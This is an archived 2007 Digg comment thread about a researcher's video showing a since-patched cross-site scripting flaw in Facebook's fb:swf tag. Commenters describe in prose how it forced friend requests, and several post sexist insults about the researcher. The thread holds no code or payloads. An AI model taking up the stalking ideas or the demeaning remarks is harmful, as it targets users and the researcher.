Facebook Loophole: i-frames watch!
5min.com — Learn how to manipulate Facebooks privacy settings using i-frames and style sheets. NOT intended for malicious use!
twrkeke- 899 diggs
- digg it
- padfignton, on 11/27/2007, -18/+0I like it
- persecuted, on 11/27/2007, -1/+11Insightful and thought provoking point.
- Johnbrad34, on 11/27/2007, -16/+2I'm not sure it's educational, but cool trick .
- echolyean, on 11/27/2007, -0/+8It's not a trick, it's a warning. A lesson, as it were. So yes, it is educational.
- mwang1999, on 11/27/2007, -35/+2Only 27 diggs and on the front page? Is this a new record?
- Archon810, on 11/27/2007, -2/+27No.
- mwang1999, on 11/27/2007, -3/+1What's the record, then for least number of diggs to front page?
- Archon810, on 11/27/2007, -0/+1226. It's in the Guinness World Book of Records, you can go check.
- Tenetri, on 11/27/2007, -0/+215 is the minimum I believe, but thats all time calculations and such
- PaulLewis, on 11/27/2007, -0/+0Actually just one. A moderator got his post up to the front page with only 1 digg.
- mwang1999, on 11/27/2007, -3/+1What's the record, then for least number of diggs to front page?
- johnwc723, on 11/27/2007, -0/+2I can imagine it doesn't take too many diggs for something from Videos>Educational section to end up on the front page...
- Chaulis, on 11/27/2007, -0/+3He has been dug down 27 times, i kinda don't want to dig him down more. 27 seems fitting.
- Archon810, on 11/27/2007, -2/+27No.
- DeviantDragon, on 11/27/2007, -3/+79Okay the main implication is not that it's "cool" it's that this has tremendous potential for malicious action and abuse. Beware.
- diulei, on 11/27/2007, -1/+38If you visit her website detailing her Facebook project, you'll see that they've already fixed this exploit as of August 2007. So this video is a few months old.
http://www.cs.virginia.edu/felt/fbook/- jserio, on 11/27/2007, -0/+5I'd hit it! I mean, um.
- radzie78, on 11/28/2007, -0/+2http://www.cs.virginia.edu/felt/photo.html
- jserio, on 11/27/2007, -0/+5I'd hit it! I mean, um.
- webcrumb, on 11/27/2007, -11/+2Yet more proof that Internet Explorer is the worst thing to happen to the web... except for the whole making Mozilla happen thing... can anyone explain why we need iframes anyway?
- iziizi, on 11/27/2007, -0/+8Yes, but i cant be bothered. And the exploit was through FIREFOX...
- capitocapito, on 11/27/2007, -1/+2It was shown in Firefox, but it can easily be extended to Internet explorer.
It's not the fault of either browser. The exploit happened in the Facebook's SWF tag in their application development platform. It is facebook's fault.
- capitocapito, on 11/27/2007, -1/+2It was shown in Firefox, but it can easily be extended to Internet explorer.
- sint4x, on 11/27/2007, -0/+2WYSIWYG editors
- webcrumb, on 11/27/2007, -0/+1I see most of you missed my point, which was not to blame IE allowing the exploit now, but for introducing the iframe element in the first place. IE3 was the first browser to support iframes (Netscape 4 did not). Hence, all use of the iframe tag as introduced into the HTML4 spec stems from that.
- iziizi, on 11/27/2007, -0/+8Yes, but i cant be bothered. And the exploit was through FIREFOX...
- riah, on 11/27/2007, -0/+2Link to full details of how it worked, for those interested:
http://www.cs.virginia.edu/felt/fbook/facebook-xss ...
- diulei, on 11/27/2007, -1/+38If you visit her website detailing her Facebook project, you'll see that they've already fixed this exploit as of August 2007. So this video is a few months old.
- Archon810, on 11/27/2007, -10/+3How long till it's maliciously used?
- teh_techie, on 11/27/2007, -0/+5Well, seeing as how they already patched this hole.. never!
- luet, on 11/27/2007, -4/+9I'm burying this because of what the end of the video said. It will happen.
- Commodore84, on 11/27/2007, -0/+4Whoa, that was a close one. I'm glad we have you on the lookout burying things for us so the bad guys don't find out. Meanwhile, it makes the front page.
P.S. It was fixed in August.
- Commodore84, on 11/27/2007, -0/+4Whoa, that was a close one. I'm glad we have you on the lookout burying things for us so the bad guys don't find out. Meanwhile, it makes the front page.
- a3r0, on 11/27/2007, -3/+5I believe this has been fixed. Although, there are likely quite a few more
- MALONN, on 11/27/2007, -8/+1Wonder how long until this exploit is fixed
- dankosaur, on 11/27/2007, -0/+26negative 3 months
- merreborn, on 11/27/2007, -1/+5It was fixed in August.
http://www.cs.virginia.edu/felt/fbook/- theblt, on 11/27/2007, -2/+1This is a different exploit that hasn't been patched yet. The one you linked to uses the FB:SWF element which is different from the one this girl was describing.
- manitoba98xp, on 11/27/2007, -0/+1Incorrect. This is the same exploit.
- theblt, on 11/27/2007, -2/+1This is a different exploit that hasn't been patched yet. The one you linked to uses the FB:SWF element which is different from the one this girl was describing.
- DemsFTW, on 11/27/2007, -10/+0@ Archon810 - Too late..
just kidding.- arcooke, on 11/27/2007, -0/+13@ DemsFTW - Use the reply link.
not kidding.- koft, on 11/27/2007, -0/+1What are you, the ***** digg police?
- arcooke, on 11/27/2007, -0/+13@ DemsFTW - Use the reply link.
- jus1haz2, on 11/27/2007, -10/+129I wonder if the girl is hot?
- JARSInc, on 11/27/2007, -3/+45http://xkcd.com/322/
- OpenFuture, on 11/27/2007, -15/+1no very, very, very obese
- NicksVideo, on 11/27/2007, -0/+39http://www.cs.virginia.edu/felt/photo.html
- Bologner, on 11/27/2007, -1/+26Wow, cute as hell.
- jimi1337, on 11/27/2007, -14/+2Meh:
http://www.cs.virginia.edu/felt/photo.html - will-rom, on 11/27/2007, -7/+37doesn't matter. she's doesn't even use Adblock. psshhh. what a n00b.
- richardiscool, on 11/27/2007, -2/+17She's using Safari.
- Murdats, on 11/27/2007, -5/+18exactly, psshhh. what a n00b
- richardiscool, on 11/27/2007, -2/+17She's using Safari.
- michaelothomas, on 11/27/2007, -11/+5Well, at a bare minimum, she's out of your league. *****.
- cnot3, on 11/27/2007, -11/+8She's in CS, its questionable if she is even really a girl.
- Funpolice2050, on 11/28/2007, -0/+0So true.
- postalblowfish7, on 11/27/2007, -0/+15she's out of your league.
- Mageling, on 11/27/2007, -0/+8Yeah, she's conscious.
- hartley, on 11/27/2007, -9/+1I have been doing the same thing for a long time over at Office Live.
They're tools are terrible, but I can link and add my own content and coding by using i-frames.- arcooke, on 11/27/2007, -2/+7Their.
Would you say "They are tools are terrible"? No.. so don't use "they're".
English 101. Stay in school.- bejayel, on 11/27/2007, -0/+1thats somethign i would almost classify as english pre-kindergarden actually.
- Bologner, on 11/27/2007, -0/+2So is capitalizing the first word in a sentence, spelling "something", capitalizing your "I"s, and separating sentence fragments with punctuation.
||008. - Bologner, on 11/27/2007, -0/+1Ugh, I meant noob.
I failz at the internetz. - Murdats, on 11/27/2007, -0/+1there is a difference between being lazy, and doing something that is the same or more effort but wrong.
the internet requires basic grammar, not good grammar.
- Bologner, on 11/27/2007, -0/+2So is capitalizing the first word in a sentence, spelling "something", capitalizing your "I"s, and separating sentence fragments with punctuation.
- derjames, on 11/27/2007, -2/+3Americans. They will never learn to spell...
- koft, on 11/27/2007, -0/+1Thank you captain anal for pointing out a typo.
- bejayel, on 11/27/2007, -0/+1thats somethign i would almost classify as english pre-kindergarden actually.
- arcooke, on 11/27/2007, -2/+7Their.
- SPThom, on 11/27/2007, -10/+4Speaking of malicious action and abuse... If you get a "Flash Player 9 Required" message, I wouldn't recommend installing directly from this page. I don't want to sling mud if I'm wrong, but the installer seems very fishy, and is most definitely NOT the same installer you can get from the Flash website.
- BlueStreak69, on 11/27/2007, -8/+2Pretty awesome video. Before, I've never seen a video about computers narrated by a girl :D She knows her stuff
- legendxx, on 11/27/2007, -14/+2uva is full of pompous assholes.
also their women are unattractive.
http://www.davidcatalano.com/eklektos/2006/06/uva_ ... - TwoLOUD, on 11/27/2007, -4/+7Saying its not for malicious use surely means..'openly asking for attacks and misuse by idiots' DUMB!
- giveer, on 11/27/2007, -6/+2I'll admit my own stupidity.. her narration of the first three quarters was just "On my friend's wall post and account of my other friend, whom I friended and posted on the friend wall before making a post on the profile of my original friend request......." DAH! I think I wet myself.
- RooDoG, on 11/27/2007, -7/+10*Insert sexist digg comment here?*
- UberNick, on 11/27/2007, -1/+5The creator's page with full details on exploit:
http://www.cs.virginia.edu/felt/fbook/- UberNick, on 11/27/2007, -0/+4The idea behind the exploit is that facebook's api gives developers a swf tag to play flash movies. Facebook's code will automatically embed an image that links to this swf tag, and external styles can be applied to this image. Good find. I'm sure more exploits will be found in the API.
An interesting side note for someone with a CS degree interested in security... She posts a "censored" resume on her site that's vulnerable to the same "copy-paste exploit" as government agencies have been getting all kinds of bad press about. Bravo.- MrCalifornia, on 11/28/2007, -0/+1She must be a digger cause she fixed this.
- UberNick, on 11/29/2007, -0/+1haha, she did
- MrCalifornia, on 11/28/2007, -0/+1She must be a digger cause she fixed this.
- merreborn, on 11/27/2007, -1/+6It also says that facebook closed the hole 2 months ago.
- UberNick, on 11/27/2007, -0/+4The idea behind the exploit is that facebook's api gives developers a swf tag to play flash movies. Facebook's code will automatically embed an image that links to this swf tag, and external styles can be applied to this image. Good find. I'm sure more exploits will be found in the API.
- TheBigPoppaJW, on 11/27/2007, -4/+6confused? so how do i use this to my advantage/stalkerness?
- Jektal, on 11/27/2007, -0/+1Do this on your profile, have everyone who visits send you a friend request or message, and track who views your profile?
- Rockmaninoff, on 11/27/2007, -7/+2GO HOOS.
- kalleanka, on 11/27/2007, -0/+23From her website:
"Facebook patched the XSS hole last night. The flaw was located in the fb:swf tag, which is the FBML tag that allows for the embedding of a Flash swf file."
Seems it's fixed by now.- vsujohn2, on 11/27/2007, -0/+12Lol, last night as in 2+ months ago
- voetsjoeba, on 11/27/2007, -0/+9I puked a little when I realized what FBML stands for.
- MalDON, on 11/27/2007, -4/+2Wow, I've known about this for a long time. Facebook has many, many issues that are hidden. Facebook developers get all the fun.
- Hixz, on 11/27/2007, -2/+7"Facebook patched the XSS hole last night." posted on 16 August 2007
http://www.cs.virginia.edu/felt/fbook/
laugh out loud. - amk07, on 11/27/2007, -10/+5She's not as beastly as I envisioned...
http://www.cs.virginia.edu/felt/photo.html- gamarada717, on 11/27/2007, -3/+1Wow. Nice Find.
- zachshmack, on 11/27/2007, -0/+1You're creepy.
- SealandRes1, on 11/27/2007, -1/+1Would you not need administrative access to add/modify stylesheets used to insert iFrames?
In other words, this needs to be done on a computer with administrative access, which probably amounts to nothing much more than someone's computer.- adrifelt, on 11/27/2007, -0/+1No, you can do that dynamically with JavaScript.
- Damian91, on 11/27/2007, -5/+1All I want is a simple background instead of white. Is that so much to ask!? :(
- plusmedic, on 11/27/2007, -0/+8Yes, far too much. Facebook applications have ruined Facebook enough at is, the last thing it needs is the ability for users to start modifying their profile until it's an ugly, seething, sparkling page of bad design.
- phronko, on 11/27/2007, -0/+5Myspace.
That is all. - LordRedSnake, on 11/27/2007, -2/+0Yes go back to myspace. I knew facebook was going downhill once they opened up to non-ivy league colleges, and now anybody.
- dhess, on 11/27/2007, -5/+4Aaaaaaaand... this Virginia cs student just secured a cushy job at Facebook for herself. Well done =)
- uracre, on 11/27/2007, -0/+2Doesn't really happen that way. First she has to come up with something more than digging for exploits and security holes. In this case this is not even a major issue to begin with.
- skeetshot, on 11/27/2007, -2/+11All your wall post are belong to us
- tomharrow, on 11/27/2007, -1/+3jesus christ - that is a blast from the past!
- michaelothomas, on 11/27/2007, -0/+9Congrats on making the front page of digg Adrienne, who cares if it's like 3 months late...:)
- ShokDoktor, on 11/27/2007, -4/+3hidden iframes are such a dirty hack.
- casual7y, on 11/27/2007, -2/+6sweet -- so i should be able to make hot girls create relationship requests with me amirite?!
- tapeman11, on 11/27/2007, -5/+0Adrienne Felt..... my wiener. This is stupid, who cares, I cannot believe this made Digg front page, it makes me sad.
- diggjosh, on 11/27/2007, -8/+3BURIED AS INNACURATE!
Girls know nothing of Ajax, js, etc. - KingBunny, on 11/27/2007, -0/+1@ arcooke:
Maybe there WAS NO reply link for him.. for me, it disappears when I log in, which is the only time I'd want to click it...
PS: WHERE'S THE DAMN REPLY LINK??? >:( - mrjoanofarc, on 11/27/2007, -4/+1If they want their profile to look like myspace, I say, use myspace. Not facebook. I realized what this was all about as soon as she switched the screen to the "cool" profile with the annoying, neverending, mini-scroll boxes.
- mrjoanofarc, on 11/27/2007, -2/+1Too bad I can't delete. Sorry.
- mrjoanofarc, on 11/27/2007, -4/+1If they want their profile to look like myspace, I say, use myspace. Not facebook. I realized what this was all about as soon as she switched the screen to the "cool" profile with the annoying, neverending, mini-scroll boxes and terrible, ugly bars of pink.
- Bojimha, on 06/09/2008, -1/+1I wish I could have purple trim on my headings too :-(
- Raerth, on 11/27/2007, -0/+1Any browser that lets you add custom style sheets (or userscripts) will do, like hmm, firefox, opera, etc...
- jakash, on 11/27/2007, -0/+2je ne comprends pas :(
- Archer007, on 11/27/2007, -0/+1"Here's how to seriously exploit a major Internet site, but it's NOT for abuse... No, really..."
- JayCracker, on 11/27/2007, -1/+1a majorly ***** internet site.
- steelclash84, on 11/27/2007, -1/+1This will teach people that mindlessly accept a friend's request without actually knowing the person. All in the name of becoming e-popular with a meaningless number of friends statistic. If they get hacked and have their privacy stuff leaked, then it serves them right.
- JayCracker, on 11/27/2007, -7/+1woot! go figure an american government website has security flaws, ah well at least all those dumb asses like to get profiled.
- gamerzworld, on 11/27/2007, -6/+2Facebook = MySpace.
- mhender, on 11/27/2007, -2/+2using Z in your name instead of S = cool in middle school.
- UNL1M1T3D, on 11/27/2007, -1/+1You sir deserve three diggs.
- mhender, on 11/27/2007, -2/+2using Z in your name instead of S = cool in middle school.
- adrifelt, on 11/27/2007, -0/+2The filtering hole that made this possible was fixed in August. What I think is interesting is the fact that a small, simple hole can be abused to do major damage (take control over user accounts / spread like a virus / etc). Although they patched the hole, the design flaw still exists. Mashup security is hard. If you want detailed information on how this type of thing works, check out: http://www.cs.virginia.edu/felt/fbook/facebook-xss ...
Also, there's a lot of confusion about the friend requests.....clearly the VICTIM is not the one OKing the friend request. If you had looked at my profile while this worked, you'd unknowingly send me a friend request. Then I (as the hacker who controls the code) have the option of accepting/not accepting the request. - arsalan, on 11/27/2007, -7/+4i think the problem is his apple computer not the website ;)
- mhender, on 11/27/2007, -0/+2It's a woman.
Believe it.
- mhender, on 11/27/2007, -0/+2It's a woman.
- iguanapunk, on 11/27/2007, -5/+1What a stupid bitch! If only she could properly communicate, I wouldn't be so angry.
- Helois, on 11/27/2007, -3/+1Kind of lame , if this was a male commenting would it be front page 3 months late?
- ctc803, on 11/27/2007, -0/+1this doesnt teach you how to do it it just shows it being done!
- CyberSol, on 11/27/2007, -0/+2Mom?
- RSS14, on 11/27/2007, -0/+1I had no idea what the hell she was talking about, the only reason I watched until the end was because she was a girl :/
- PhrosTT, on 11/28/2007, -1/+1SUMMARY OF HACK:
1. facebook let's you develop apps
2. app's can include FBML tags, their made up markup, for a bunch of different things.
one such thing is styling the image they will use for a thumbnail of any flash in your app
-they replace any swf's with image thumbnails and make you click before they load - this way no annoying sounds and ***** on page load.
3. the is eventually parsed by facebook into an HTML -
Show 51 - 53 of 53 discussions
Digg is coming to a city (and computer) near you! Check out all the details on our 
© Digg Inc. 2008 —
Content posted by